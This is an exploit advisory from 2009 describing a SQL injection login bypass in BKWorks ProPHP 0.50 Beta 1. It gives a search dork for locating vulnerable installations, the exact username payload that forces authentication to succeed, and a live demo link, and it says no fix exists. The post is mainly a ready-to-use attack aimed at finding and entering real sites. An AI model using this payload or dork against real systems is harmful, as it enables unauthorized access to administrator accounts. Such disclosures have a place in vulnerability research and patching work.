BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability

2009-01-11 06:03:39

#############################################################################################
[+] BKWorks ProPHP 0.50 Beta 1 (Auth Bypass) SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#############################################################################################

[+] Dork : Powered by BKWorks ProPHP Version 0.50 Beta 1

[+] SQL Injection Login Bypass

- Login as :

Username : admin ' or ' 1=1

Password : anything or nothing

And you will be logged in.

- Live Demo

http://old.bkworksproducts.info/content/products/demos/ProPHP/


#############################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.